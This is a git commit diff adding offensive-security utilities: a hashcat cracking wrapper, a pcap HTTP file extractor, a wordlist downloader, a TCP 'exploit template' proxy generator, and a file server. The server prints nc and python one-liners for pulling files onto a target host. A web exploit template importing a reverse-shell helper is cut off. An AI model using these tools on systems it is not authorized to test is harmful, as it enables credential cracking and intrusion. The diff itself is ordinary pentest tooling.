Repository restructuring

This commit is contained in:
2026-04-30 19:53:18 +02:00
parent 31af1f4423
commit f233fe8264
98 changed files with 4216 additions and 1392 deletions

100
tools/misc/crack_hash.py Executable file
View File

@@ -0,0 +1,100 @@
#!/usr/bin/env python
import os
import sys
import subprocess
import json
import tempfile
from name_that_hash import runner
def load_cracked_hashes():
    """Load previously cracked hashes from hashcat's potfile.

    Returns:
        dict: mapping hash -> cleartext password; empty if no potfile exists.
    """
    potfile_path = os.path.join(os.path.expanduser("~"), ".hashcat", "hashcat.potfile")
    cracked_hashes = { }
    if os.path.isfile(potfile_path):
        with open(potfile_path, "r") as f:
            for line in f:
                line = line.strip()
                # potfile format is <hash>:<password>; the hash itself may
                # contain ":" (salted types), so split once from the right.
                # Skip malformed/blank lines instead of raising ValueError.
                if ":" not in line:
                    continue
                hash_value, password = line.rsplit(":", 1)
                cracked_hashes[hash_value] = password
    return cracked_hashes
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: %s <file>" % sys.argv[0])
        exit(1)

    # read the hash list, dropping blank lines
    hashes = filter(None, [line.strip() for line in open(sys.argv[1], "r").readlines()])

    # drop hashes hashcat already cracked (looked up with and without a
    # possible ":"-separated salt suffix)
    potfile = load_cracked_hashes()
    if potfile:
        uncracked_hashes = []
        for hash in hashes:
            password = potfile.get(hash, potfile.get(hash.rsplit(":", 1)[0], None))
            if password:
                print(f"Potfile: {hash}: {password}")
            else:
                uncracked_hashes.append(hash)
    else:
        uncracked_hashes = hashes

    # identify candidate hash types via name-that-hash
    hashes = json.loads(runner.api_return_hashes_as_json(uncracked_hashes))
    wordlist = "/usr/share/wordlists/rockyou.txt" if len(sys.argv) < 3 else sys.argv[2]

    # group the hashes by hashcat mode id
    hash_types = { }
    for hash, types in hashes.items():
        for t in types:
            hash_id = t["hashcat"]
            if hash_id is None:
                continue
            # salted hashes contain ":"; only accept candidates whose
            # "extended" flag matches that observation
            salted = ":" in hash
            if salted != t["extended"]:
                continue
            if hash_id not in hash_types:
                hash_types[hash_id] = { "name": t["name"], "hashes": {hash} }
            else:
                hash_types[hash_id]["hashes"].add(hash)

    if len(hash_types) > 0:
        uncracked_types = list(hash_types.keys())
        num_types = len(uncracked_types)
        if num_types > 1:
            print("There are multiple uncracked hashes left with different hash types, choose one to proceed with hashcat:")
            print()
            i = 0
            for hash_id, hash_type in hash_types.items():
                name = (hash_type["name"] + ": ").ljust(max(len(x["name"]) for x in hash_types.values()) + 2)
                count = len(hash_type["hashes"])
                index = (f"{i}. ").ljust(len(str(num_types - 1)) + 2)
                print(f"{index}{name}{count} hashe(s)")
                i += 1
            # Ask user…
            selected = None
            while selected is None or selected < 0 or selected >= num_types:
                try:
                    selected = int(input("Your Choice: ").strip())
                    if selected >= 0 and selected < num_types:
                        break
                except Exception as e:
                    if type(e) in [EOFError, KeyboardInterrupt]:
                        print()
                        exit()
                print("Invalid input")
            selected_type = uncracked_types[selected]
        else:
            selected_type = uncracked_types[0]

        # write the chosen group to a temp file and hand off to hashcat
        fp = tempfile.NamedTemporaryFile()
        for hash in hash_types[selected_type]["hashes"]:
            fp.write(b"%s\n" % hash.encode("UTF-8"))
        fp.flush()
        # BUGFIX: pass only the extra arguments (argv[3:]); argv[2] is the
        # wordlist and was previously appended to the command a second time
        proc = subprocess.Popen(["hashcat", "-m", str(selected_type), "-a", "0", fp.name, wordlist] + sys.argv[3:])
        proc.wait()
        fp.close()
    else:
        print("No uncracked hashes left")

185
tools/misc/find_git_commit.py Executable file
View File

@@ -0,0 +1,185 @@
#!/usr/bin/env python3
import argparse
import re
import os
import tempfile
import subprocess
import collections
import shutil
import hashlib
import datetime
# subprocess environment: force the C locale so git's output strings are
# predictable and can be matched against below
PROC_ENV = { "LC_ALL": "C" }

def run_cmd(cmd, dir=None, raw=False):
    """Run *cmd* in directory *dir* and return (exit_code, output).

    Output is the concatenation of stdout and stderr; unless *raw* is True it
    is decoded to str and stripped of surrounding whitespace.
    """
    process = subprocess.Popen(cmd, cwd=dir, env=PROC_ENV,
                               stderr=subprocess.PIPE, stdout=subprocess.PIPE)
    stdout, stderr = process.communicate()
    output = stdout + stderr
    if not raw:
        output = output.decode().strip()
    return process.returncode, output
def check_git_dir(dir):
    """Verify that *dir* is a git repository with a clean, up-to-date
    working tree; prints a diagnostic and returns False otherwise."""
    exit_code, out = run_cmd(["git", "status"], dir)
    if "not a git repository" in out:
        print("[-] Given directory is not a git repository.")
        return False
    elif exit_code != 0:
        # BUGFIX: check the exit code before the clean-state strings —
        # previously any other git failure fell into the "not clean" branch
        # and was misreported
        print("[-] Error checking given directory:", out)
        return False
    elif "Your branch is up to date" not in out \
            or "nothing to commit, working tree clean" not in out:
        print("[-] Git repository is not in a clean state, please reset it to HEAD")
        return False
    else:
        return True
def git_clone(dir, url):
    """Clone *url* into *dir* quietly; returns True on success."""
    print(f"[ ] Cloning {url} to {dir}")
    exit_code, out = run_cmd(["git", "clone", url, dir, "-q"])
    if exit_code != 0:
        # BUGFIX: typo "cloing" -> "cloning" in the error message
        print("[-] Error cloning git repository:")
        print(out)
        return False
    return True
def check_input_dir(dir):
    """Validate the download directory and collect its non-empty files.

    Returns a list of file paths relative to *dir*, or False when the
    directory is missing, is itself a git repository, or holds no
    non-empty files.
    """
    if not os.path.isdir(dir):
        print("[-] Invalid directory:", dir)
        return False
    if os.path.isdir(os.path.join(dir, ".git")):
        print("[-] Directory to check should not be a git repository")
        return False
    real_root = os.path.realpath(dir)
    valid_files = []
    for walk_root, _, names in os.walk(dir):
        for name in names:
            resolved = os.path.realpath(os.path.join(walk_root, name))
            # only keep files with content; empty files match any commit
            if os.path.getsize(resolved) > 0:
                valid_files.append(resolved[len(real_root) + 1:])
    if not valid_files:
        print("[-] Given directory does not contain any non-empty files")
        return False
    return valid_files
def get_commits_for_file(file, git_dir):
    """Return an OrderedDict of commit_hash -> unix timestamp for every
    commit touching *file* (all branches, newest first), or None on error."""
    cmd = ["git", "log", "--no-color", "--pretty=format:%H %at", "--all", "--", file]
    exit_code, out = run_cmd(cmd, git_dir)
    if exit_code != 0:
        print("[-] git-log failed:", out)
        return None
    commits = collections.OrderedDict()
    # each output line is "<hash> <timestamp>"
    # (removed dead "data = line.split(...)" and stopped shadowing the
    # module-level hash() helper with a local name)
    for line in out.split("\n"):
        if line:
            commit_hash, ts = line.split(" ")
            commits[commit_hash] = int(ts)
    return commits
def hash(data, alg):
    """Digest *data* with the hashlib algorithm *alg*; returns a hex string.

    NOTE: intentionally keeps the original name even though it shadows the
    builtin `hash` — callers in this file rely on it.
    """
    return hashlib.new(alg, data).hexdigest()
def read_file(file):
    """Return the raw byte contents of *file*."""
    with open(file, "rb") as handle:
        content = handle.read()
    return content
def find_newest_commit(git_dir, file_name, sha1hash, md5hash, commits):
    """Scan *commits* (iterated oldest-first, i.e. reversed git-log order)
    and return the first commit whose version of *file_name* matches both
    digests; None if nothing matches or git-show fails."""
    for commit in reversed(commits.keys()):
        exit_code, content = run_cmd(["git", "show", f"{commit}:{file_name}"], git_dir, raw=True)
        if exit_code != 0:
            print("[-] git-show failed:", content)
            return None
        if hash(content, "sha1") == sha1hash and hash(content, "md5") == md5hash:
            return commit
    return None
def get_commit_message(dir, commit_hash):
    """Return the full commit message of *commit_hash*, or None on error."""
    cmd = ["git", "log", "--no-color", "--pretty=format:%B", "-n1", commit_hash]
    exit_code, message = run_cmd(cmd, dir)
    if exit_code == 0:
        return message
    print("[-] git-log failed:", message)
    return None
def run(files, root_dir, git_dir):
    """For every file under *root_dir*, look for a matching commit in
    *git_dir* and print the newest candidate found."""
    latest_commit = None
    latest_ts = None
    for f in files:
        commits = get_commits_for_file(f, git_dir)
        if commits:
            print(f"[+] {f} found in git history")
            # read the file once and digest it with both algorithms
            # (it was previously read from disk twice)
            content = read_file(os.path.join(root_dir, f))
            sha1hash = hash(content, "sha1")
            md5hash = hash(content, "md5")
            found_commit = find_newest_commit(git_dir, f, sha1hash, md5hash, commits)
            if found_commit:
                print(f"[+] Commit {found_commit} matches")
                # keep the commit with the largest timestamp across all files
                if latest_commit is None or commits[found_commit] > latest_ts:
                    latest_commit = found_commit
                    latest_ts = commits[found_commit]
        else:
            print(f"[-] {f} not found in git history")
    if latest_commit is None:
        print("[-] No matching commit found")
    else:
        title = get_commit_message(git_dir, latest_commit)
        formatted_dt = datetime.datetime.fromtimestamp(latest_ts).strftime("%A, %d. %B %Y %I:%M%p")
        print(f"[+] Commit might be: {latest_commit}, {formatted_dt}, {title}")
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        dest="dir",
        help="The directory containing downloaded files"
    )
    parser.add_argument(
        dest="git",
        help="URL or path to git repository to compare to"
    )
    parser.add_argument(
        "-n",
        "--no-delete",
        dest="nodelete",
        action="store_true",
        help="Don't delete the git directory after cloning"
    )
    is_remote_git = False
    args = parser.parse_args()
    git_dir = args.git
    # Treat the git argument as remote when it looks like a git://
    # or http(s):// URL, or like an scp-style "user@host:path" spec;
    # remote repositories are cloned into a temporary directory first.
    if re.match("^(git|https?)://.*", args.git) or \
            (len(args.git.split(":")) == 2 and "@" in args.git.split(":")[0]):
        git_dir = tempfile.TemporaryDirectory(suffix=".git").name
        is_remote_git = True
        if not git_clone(git_dir, args.git):
            exit(1)
    if check_git_dir(git_dir):
        valid_files = check_input_dir(args.dir)
        if valid_files != False:
            run(valid_files, args.dir, git_dir)
    # remove cloned repositories again unless -n/--no-delete was given
    if is_remote_git and not args.nodelete:
        shutil.rmtree(git_dir)

362
tools/misc/pcap_file_extract.py Executable file
View File

@@ -0,0 +1,362 @@
#!/bin/python
import argparse
import os
import re
from abc import ABC, abstractmethod
from scapy.all import *
from hackingscripts import util
from collections import OrderedDict
class HttpPacket(ABC):
    """Base class for an HTTP message reassembled from a TCP stream."""

    def __init__(self, sock_src, version):
        self.version = version                     # HTTP version string, e.g. "1.1"
        self.headers = util.CaseInsensitiveDict()  # header name -> value
        self.payload = None                        # raw body bytes, set by parse()
        self.socket = sock_src                     # "ip:port" of the sender

    @staticmethod
    def parse(sock_src, data):
        """Parse raw bytes into an HttpRequest or HttpResponse.

        Returns None if the first line matches neither pattern.
        NOTE(review): raises ValueError when *data* lacks a CRLF or the
        blank-line header terminator — callers appear to pass complete
        reassembled messages; confirm for truncated streams.
        """
        index = data.index(b"\r\n")
        first_line = data[0:index+2].decode()
        matches_req = re.match(HttpRequest.PATTERN.decode(), first_line)
        matches_res = re.match(HttpResponse.PATTERN.decode(), first_line)
        if matches_req:
            http_packet = HttpRequest(sock_src, *matches_req.groups())
        elif matches_res:
            http_packet = HttpResponse(sock_src, *matches_res.groups())
        else:
            return None
        # split the header block from the body at the first blank line
        header_end = data.index(b"\r\n\r\n")
        header_buffer = data[index+2:header_end+2].decode()
        http_packet.payload = data[header_end+4:]
        for line in re.findall("([^:]+):\s?(.*)\r\n", header_buffer):
            http_packet.headers[line[0]] = line[1]
        return http_packet

    @abstractmethod
    def get_file_path(self):
        """Return a file path/name describing the payload, or None."""
        pass
class HttpRequest(HttpPacket):
    """A parsed HTTP request (request line, headers and body)."""

    PATTERN = b"([A-Z]+) ([^ ]+) HTTP/([0-9.]+)\r\n"

    def __init__(self, socket, method, uri, version):
        super().__init__(socket, version)
        self.method = method
        self.uri = uri

    def get_file_path(self):
        # the request URI doubles as the file path
        return self.uri

    def __repr__(self):
        size = util.human_readable_size(len(self.payload))
        return f"{self.method} {self.uri} HTTP/{self.version}, payload=" + size
class HttpResponse(HttpPacket):
    """A parsed HTTP response (status line, headers and body)."""

    PATTERN = b"HTTP/([0-9.]+) ([0-9]+) (.*)\r\n"

    def __init__(self, socket, version, status_code, status_text):
        super().__init__(socket, version)
        self.status_code = int(status_code)
        self.status_text = status_text
        self.response_to = None  # matching HttpRequest, set by the extractor

    def get_file_path(self):
        """Prefer the Content-Disposition filename; fall back to the path
        of the request this response answers; None if neither exists."""
        content_disposition = self.headers.get("Content-Disposition", None)
        if content_disposition:
            # BUGFIX: the old greedy pattern ';\s*filename="?(.*)"?(;|$)'
            # captured a trailing quote as part of the filename; exclude
            # quotes and separators from the capture group instead
            matches = re.findall(";\s*filename=\"?([^\";]*)\"?(;|$)", content_disposition)
            if matches:
                return matches[0][0]
        if self.response_to:
            return self.response_to.get_file_path()
        return None

    def __repr__(self):
        return f"HTTP/{self.version} {self.status_code} {self.status_text}, payload=" + util.human_readable_size(len(self.payload))
class PacketIterator:
    """Forward-only cursor over a TcpConnection's packets with peek/pop and
    payload-pattern search."""

    def __init__(self, connection):
        self.connection = connection
        self.index = 0  # position of the next packet to yield

    def __iter__(self):
        # iterating restarts from the first packet
        self.index = 0
        return self

    def __next__(self):
        if self.has_more():
            packet = self.connection.packets[self.index]
            self.index += 1
            return packet
        else:
            raise StopIteration

    def peek(self):
        # next packet without consuming it; None when exhausted
        return None if not self.has_more() else self.connection.packets[self.index]

    def pop(self):
        # consume and return the next packet; None when exhausted
        packet = self.peek()
        if packet:
            self.index += 1
        return packet

    def find_packet(self, pattern, sock_src=None):
        """Advance until a packet whose TCP payload matches *pattern*,
        optionally restricted to packets sent by *sock_src*.

        Returns (packet, first_match, sender "ip:port") or None when the
        connection is exhausted; the cursor is consumed either way.
        """
        for packet in self.connection.packets[self.index:]:
            self.index += 1
            tcp_packet = packet[TCP]
            ip_hdr = packet[IP]
            packet_src = f"{ip_hdr.src}:{tcp_packet.sport}"
            if sock_src is not None and packet_src != sock_src:
                continue
            payload = bytes(tcp_packet.payload)
            match = re.findall(pattern, payload)
            if match:
                return packet, match[0], packet_src
        return None

    def has_more(self):
        # True while packets remain beyond the cursor
        return self.index < len(self.connection.packets)
class TcpConnection:
    """All packets exchanged between two endpoints ("ip:port" strings)."""

    def __init__(self, sock_a, sock_b):
        self.sock_a = sock_a
        self.sock_b = sock_b
        self.packets = []
        self._payload_size = 0  # accumulated TCP payload bytes, for __repr__

    def add_packet(self, packet):
        """Record *packet* and account for its TCP payload size."""
        self.packets.append(packet)
        self._payload_size += len(packet[TCP].payload)

    def get_key(self):
        """Direction-independent identifier for this connection."""
        return TcpConnections._format_key(self.sock_a, self.sock_b)

    def iterator(self):
        """Return a fresh PacketIterator over this connection."""
        return PacketIterator(self)

    def get_other_sock(self, sock):
        """Given one endpoint, return the opposite one."""
        return self.sock_a if sock == self.sock_b else self.sock_b

    def __repr__(self):
        size = util.human_readable_size(self._payload_size)
        return f"{self.get_key()}: {len(self.packets)} packets, {size}"
class TcpConnections:
    """Collection of TcpConnection objects, keyed by their normalized
    endpoint pair (see _format_key)."""

    def __init__(self):
        self.connections = OrderedDict()

    def __contains__(self, item: TcpConnection):
        # BUGFIX: entries are keyed via _format_key(); the previous
        # str(item) used TcpConnection.__repr__ (which embeds the mutable
        # packet count) and therefore never matched keys created by
        # add_packet()
        return item.get_key() in self.connections

    def add(self, element: TcpConnection):
        self.connections[element.get_key()] = element

    def __getitem__(self, item: TcpConnection):
        return self.connections[item.get_key()]

    def __iter__(self):
        return iter(self.connections.values())

    @staticmethod
    def _format_key(sock_a, sock_b):
        # order-independent key so both traffic directions map to the same
        # connection entry
        return f"{sock_a}<->{sock_b}" if sock_a < sock_b else f"{sock_b}<->{sock_a}"

    def get_connection(self, sock_a, sock_b):
        key = self._format_key(sock_a, sock_b)
        return self.connections[key]

    def add_packet(self, sock_src, sock_dst, packet):
        """Append *packet* to the connection for this endpoint pair,
        creating the connection on first sight; returns the connection."""
        key = self._format_key(sock_src, sock_dst)
        if key not in self.connections:
            self.connections[key] = TcpConnection(sock_src, sock_dst)
        self.connections[key].add_packet(packet)
        return self.connections[key]
class PcapExtractor:
    """Extracts files transferred over HTTP from a pcap capture.

    Groups TCP packets into connections, reassembles HTTP request/response
    pairs, applies the configured filter predicates and writes payloads to
    *output_dir*.
    """

    def __init__(self, pcap_path, output_dir="extracted_files/", filters=None):
        self.pcap_path = pcap_path    # path of the capture file to read
        self.output_dir = output_dir  # destination directory for payloads
        self.filters = filters if filters is not None else []  # predicates over HttpPacket
        self._packets = None          # scapy packet list, set by _open_file()

    def _open_file(self):
        # reads the entire capture into memory via scapy
        self._packets = rdpcap(self.pcap_path)

    def extract_all(self):
        """Write every filtered, non-empty HTTP payload into the output
        directory; "/" in the derived path is flattened to "_"."""
        self._open_file()
        http_packets = self._parse_http_packets()
        filtered_packets = self._apply_filters(http_packets)
        for packet in filtered_packets:
            if len(packet.payload) > 0:
                file_path = packet.get_file_path()
                with open(os.path.join(self.output_dir, file_path.replace("/", "_")), "wb") as f:
                    f.write(packet.payload)
                print(f"[+] Extracted: {file_path} {util.human_readable_size(len(packet.payload))} Bytes")

    def __iter__(self):
        # parse lazily on iteration so the extractor can be used as an iterable
        self._open_file()
        http_packets = self._parse_http_packets()
        self.iter_filtered_packets = self._apply_filters(http_packets)
        return iter(self.iter_filtered_packets)

    def __next__(self):
        return next(self.iter_filtered_packets)

    def _apply_filters(self, packets):
        # chain all predicates, then materialize the surviving packets
        filtered_packets = packets
        for f in self.filters:
            filtered_packets = filter(f, filtered_packets)
        return list(filtered_packets)

    def list(self):
        """Print the filtered HTTP packets without extracting anything."""
        self._open_file()
        http_packets = self._parse_http_packets()
        filtered_packets = self._apply_filters(http_packets)
        for packet in filtered_packets:
            print(packet)

    def get_http_packet(self, packet_iterator, sock_src, initial_packet):
        """Reassemble one HTTP message sent by *sock_src*, starting at
        *initial_packet* and consuming subsequent packets from the same
        sender until the peer talks back."""
        http_buffer = raw(initial_packet[TCP].payload)
        prev_seq = initial_packet[TCP].seq
        buff = None  # (seq, payload) of a suspected ZeroWindowProbe byte
        while packet_iterator.has_more():
            next_packet = packet_iterator.peek()
            if sock_src == f"{next_packet[IP].src}:{next_packet[TCP].sport}":
                next_packet = packet_iterator.pop()
                if buff is not None:
                    # if there is a buffered package, and the seq. number was not reused
                    if buff[0] != next_packet[TCP].seq:
                        # append this to output
                        http_buffer += buff[1]
                    buff = None
                payload_len = len(next_packet[TCP].payload)
                if next_packet[TCP].seq - prev_seq != payload_len and payload_len == 1:
                    buff = (next_packet[TCP].seq, raw(next_packet[TCP].payload))
                    # potential TCP ZeroWindowProbe
                    continue
                # TODO: instead of assertions, we should make sure, the seq. is ascending
                assert next_packet[TCP].seq > prev_seq
                assert next_packet[IP].frag == 0
                http_buffer += raw(next_packet[TCP].payload)
                prev_seq = next_packet[TCP].seq
            else:
                # the other side started sending: message complete
                break
        return HttpPacket.parse(sock_src, http_buffer)

    def _parse_http_packets(self):
        """Group payload-carrying TCP packets by connection, then scan each
        connection for HTTP request/response pairs."""
        connections = TcpConnections()
        for packet in self._packets:
            if TCP not in packet:
                continue
            ip_hdr = packet[IP]
            tcp_packet = packet[TCP]
            if len(tcp_packet.payload) == 0:
                continue  # skip pure ACKs / handshake packets
            sock_src = f"{ip_hdr.src}:{tcp_packet.sport}"
            sock_dst = f"{ip_hdr.dst}:{tcp_packet.dport}"
            connections.add_packet(sock_src, sock_dst, packet)
        http_packets = []
        for connection in connections:
            packet_iterator = connection.iterator()
            while packet_iterator.has_more():
                request = packet_iterator.find_packet(HttpRequest.PATTERN)
                if not request:
                    continue
                packet, match, sock_src = request
                method = match[0].decode()    # NOTE(review): currently unused
                file_name = match[1].decode().rsplit("?")[0]  # NOTE(review): currently unused
                http_request_packet = self.get_http_packet(packet_iterator, sock_src, packet)
                http_packets.append(http_request_packet)
                # the response must come from the opposite endpoint
                other_sock = connection.get_other_sock(sock_src)
                response = packet_iterator.find_packet(HttpResponse.PATTERN, sock_src=other_sock)
                if not response:
                    continue
                packet, match, sock_src = response
                status_code = match[1].decode()  # NOTE(review): currently unused
                http_response_packet = self.get_http_packet(packet_iterator, sock_src, packet)
                http_response_packet.response_to = http_request_packet
                http_packets.append(http_response_packet)
        return http_packets
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("file", help="Path to pcap file to extract files from")
    parser.add_argument("-o", "--output-dir", help="Path to destination directory", default="extracted_files/",
                        dest="output_dir")
    parser.add_argument("-l", "--list", help="List available files only", default=False, action="store_true")
    parser.add_argument("-e", "--extract", help="Extract files (default)", default=False, action="store_true")
    parser.add_argument("-ec", "--exclude-codes", help="Exclude http status codes, default: 101,304,403,404",
                        default="101,304,403,404", dest="exclude_codes")
    parser.add_argument("-ic", "--include-codes", help="Limit http status codes", type=str,
                        default="", dest="include_codes")
    parser.add_argument("-fe", "--file-extensions", help="File extensions, e.g. txt,exe,pdf", type=str,
                        default="", dest="file_extensions")
    parser.add_argument("-fn", "--file-name", help="File name, e.g. passwords.txt", type=str,
                        default="", dest="file_name")
    parser.add_argument("-fp", "--file-path", help="File path (uri), e.g. /admin/index.html", type=str,
                        default="", dest="file_path")
    # TODO: ports, ip_addresses...
    args = parser.parse_args()

    # filters are predicates over HttpPacket instances
    filters = [
        lambda p: not isinstance(p, HttpResponse) or p.status_code not in [int(x) for x in args.exclude_codes.split(",")],
    ]
    if args.include_codes:
        filters.append(lambda p: not isinstance(p, HttpResponse) or p.status_code in [int(x) for x in args.include_codes.split(",")])
    if args.file_extensions:
        # BUGFIX: HttpPacket has no "file_name" attribute, and splitext keeps
        # the leading dot so "-fe txt" never matched "file.txt"; use
        # get_file_path() (which may be None) and strip the dot
        filters.append(lambda p: os.path.splitext(p.get_file_path() or "")[1].lstrip(".") in args.file_extensions.split(","))
    if args.file_name:
        # guard against packets without a derivable file path
        filters.append(lambda p: p.get_file_path() is not None and os.path.basename(p.get_file_path()) == args.file_name)
    if args.file_path:
        filters.append(lambda p: p.get_file_path() == args.file_path)

    pcap_path = args.file
    if not os.path.isfile(pcap_path):
        print("[-] File not found or not a file:", pcap_path)
        exit(1)

    output_dir = args.output_dir
    if not os.path.isdir(output_dir):
        os.makedirs(output_dir, exist_ok=True)
        if not os.path.isdir(output_dir):
            print("[-] Output directory is not a directory or does not exist and could not be created:", output_dir)
            exit(2)

    pcap_extractor = PcapExtractor(pcap_path, output_dir, filters)
    if args.list and args.extract:
        print("[-] Can only specify one of list or extract, not both")
        exit(3)
    elif args.list:
        pcap_extractor.list()
    else:
        pcap_extractor.extract_all()

View File

@@ -0,0 +1,78 @@
#!/usr/bin/python3
import argparse
import urllib
import requests
import os
import pathlib
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def download_files(url, root_directory, wordlist, verbose=False):
    """Fetch each path in *wordlist* from *url* and mirror it below
    *root_directory*; entries resolving outside the root are skipped."""
    root_directory = str(pathlib.Path(root_directory).resolve())
    for w in wordlist:
        rel_directory = os.path.dirname(w)
        dest_directory = os.path.join(root_directory, rel_directory)
        # path-traversal guard: the resolved target must stay inside the root
        if not str(pathlib.Path(dest_directory).resolve()).startswith(root_directory):
            print("[!] Path outside the root directory:", w)
            continue
        res = requests.get(url + w, verify=False, allow_redirects=False)
        if res.status_code != 200:
            if verbose:
                print(f"[-] {url}{w}: {res.status_code} {res.reason}")
            continue
        if not os.path.isdir(dest_directory):
            os.makedirs(dest_directory, exist_ok=True)
        with open(os.path.join(root_directory, w), "wb") as f:
            f.write(res.content)
        print(f"[+] {url}{w}: {len(res.content)} Bytes")
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        dest="dir",
        help="The destination directory"
    )
    parser.add_argument(
        dest="url",
        help="The URL prefix"
    )
    parser.add_argument(
        dest="wordlist",
        help="The wordlist containing all uris"
    )
    parser.add_argument(
        "-v", "--verbose",
        action="store_true",
        help="Verbose mode",
        default=False
    )
    args = parser.parse_args()

    # normalize wordlist entries: strip whitespace and leading slashes,
    # drop empty lines and duplicates
    uris = set()
    with open(args.wordlist, "r") as f:
        for line in f:
            w = line.strip().lstrip("/")
            if w:
                uris.add(w)
    if len(uris) == 0:
        print("[!] List does not contain any URIs")
        exit()

    dest_directory = args.dir
    if not os.path.isdir(dest_directory):
        # BUGFIX: os.mkdir() returns None, so the previous
        # "if not os.mkdir(dest_directory):" always reported failure and
        # exited even when the directory was created; create it and verify
        # it exists instead
        try:
            os.makedirs(dest_directory, exist_ok=True)
        except OSError:
            pass
        if not os.path.isdir(dest_directory):
            print("[!] Destination directory does not exist and could not be created")
            exit()

    url = args.url
    if not url.endswith("/"):
        url += "/"
    download_files(url, dest_directory, uris, args.verbose)

118
tools/misc/tcp_template.py Normal file
View File

@@ -0,0 +1,118 @@
#!/usr/bin/env python
import re
import sys
import json
import argparse
import urllib.parse
def generate_template(listen_address, listen_port, remote_host, remote_port):
    """Render the source of a TCP proxy/exploit script that forwards
    listen_address:listen_port -> remote_host:remote_port.

    The returned string is a complete Python program; literal braces inside
    the template are escaped as {{ }} so only the four endpoint parameters
    are interpolated.
    """
    # we could all need that
    imports = [
        "os",
        "socket",
        "threading"
    ]
    partial_imports = {
        "hackingscripts.utils": ["util"],
        "hackingscripts.utils.packeter": ["Packer", "Parser"]
    }
    # plain imports sorted by length, then "from X import ..." lines
    imports = "\n".join(f"import {i}" for i in sorted(imports, key=len))
    imports += "\n" + "\n".join(sorted(list(f"from {p} import {', '.join(i)}" for p, i in partial_imports.items()), key=len))
    return f"""#!/usr/bin/env python
#
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY {' '.join(sys.argv)}
# For more information, visit: https://git.romanh.de/Roman/HackingScripts
#
{imports}
BUFFER_SIZE = 4096
class Packet:
    def __init__(self):
        pass
    @staticmethod
    def from_data(data):
        packet = Packet()
        parser = Parser(data)
        # TODO: auto-generated method stub
        return packet
    def pack(self):
        buf = Packer()
        # TODO: auto-generated method stub
        return buf.get()
def forward(source, destination):
    try:
        while True:
            data = source.recv(BUFFER_SIZE)
            if not data:
                break
            # TODO: Parse / Manipulate packet
            # packet = Packet.from_data(data)
            # repacked = packet.pack()
            destination.sendall(data)
    except Exception:
        pass
    finally:
        source.close()
        destination.close()
def handle_client(client_socket, remote_host, remote_port):
    try:
        remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        remote_socket.connect((remote_host, remote_port))
    except Exception as e:
        print(f"Failed to connect to remote: {{e}}")
        client_socket.close()
        return
    # Start bidirectional forwarding
    threading.Thread(target=forward, args=(client_socket, remote_socket), daemon=True).start()
    threading.Thread(target=forward, args=(remote_socket, client_socket), daemon=True).start()
def start_proxy(local_host, local_port, remote_host, remote_port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((local_host, local_port))
    server.listen(100)
    print(f"[*] Forwarding from {{local_host}}:{{local_port}} to {{remote_host}}:{{remote_port}}")
    while True:
        client_socket, addr = server.accept()
        print(f"[+] Connection from {{addr[0]}}:{{addr[1]}}")
        threading.Thread(
            target=handle_client,
            args=(client_socket, remote_host, remote_port),
            daemon=True
        ).start()
if __name__ == "__main__":
    start_proxy({repr(listen_address)}, {listen_port}, {repr(remote_host)}, {remote_port})
"""
if __name__ == "__main__":
    arg_parser = argparse.ArgumentParser(
        description="Exploit Template for tcp application attacks",
        formatter_class=argparse.RawTextHelpFormatter
    )
    valid_ports = range(1, 65535 + 1)
    arg_parser.add_argument("la", type=str, help="Listen Address")
    arg_parser.add_argument("lp", type=int, help="Listen Port", choices=valid_ports)
    arg_parser.add_argument("rh", type=str, help="Remote Host")
    arg_parser.add_argument("rp", type=int, help="Remote Port", choices=valid_ports)
    options = arg_parser.parse_args()
    # render the proxy template and emit it to stdout
    print(generate_template(options.la, options.lp, options.rh, options.rp))

53
tools/misc/upload_file.py Executable file
View File

@@ -0,0 +1,53 @@
#!/usr/bin/python
import sys
import os
import argparse
from hackingscripts.utils import util
def serve_file(listen_sock, path, forever=False):
    """Accept connections on *listen_sock* and send the contents of *path*.

    With forever=True the loop keeps serving new clients; the listening
    socket is always closed on exit, each client socket after its transfer.
    """
    try:
        while True:
            print('[ ] Waiting for a connection')
            connection, client_address = listen_sock.accept()
            try:
                print('[+] Connection from', client_address)
                with open(path, "rb") as f:
                    connection.sendall(f.read())
                print("[+] File Transfer succeeded")
            finally:
                connection.close()
            if not forever:
                break
    finally:
        listen_sock.close()
if __name__ == "__main__":
    arg_parser = argparse.ArgumentParser(description="File Transfer using netcat")
    arg_parser.add_argument("--port", type=int, required=False, default=None, help="Listening port")
    arg_parser.add_argument(type=str, dest="path", help="Path to the file you wish to upload")
    args = arg_parser.parse_args()

    path = args.path
    if not os.path.isfile(path):
        print("[-] File not found:", path)
        exit(1)

    # open a listening socket on the local address (random port unless given)
    address = util.get_address()
    listen_sock = util.open_server(address, args.port)
    if not listen_sock:
        exit(1)

    local_port = listen_sock.getsockname()[1]
    file_name = os.path.basename(path)
    # print ready-to-paste download one-liners for the target host
    print("[+] Now listening, download file using:")
    print('nc %s %d > %s' % (address, local_port, file_name))
    print('python -c \'import socket;sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM,0);sock.connect(("%s",%d));sock.sendall(open("%s","rb").read())\'' % (address, local_port, file_name))
    print()
    serve_file(listen_sock, path, forever=True)

209
tools/misc/web_template.py Executable file
View File

@@ -0,0 +1,209 @@
#!/usr/bin/env python
import re
import sys
import json
import argparse
import urllib.parse
def generate_template(base_url, features):
    """Build a Python exploit-script template targeting *base_url*.

    *features* is a list of feature flags/key=value strings (see --help);
    each recognized feature contributes imports, variables, helper methods
    and main-code snippets. Returns the generated source as one string.
    """
    # imports every generated exploit gets unconditionally
    imports = [
        "os", "io", "re", "sys",
        "json", "time", "base64", "requests",
        "subprocess", "urllib.parse"
    ]
    partial_imports = {
        "bs4": ["BeautifulSoup"],
        "hackingscripts.utils": ["util"],
        "hackingscripts.tools.exploits": ["rev_shell"],
        "urllib3.exceptions": ["InsecureRequestWarning"]
    }
    main_code = []
    methods = []

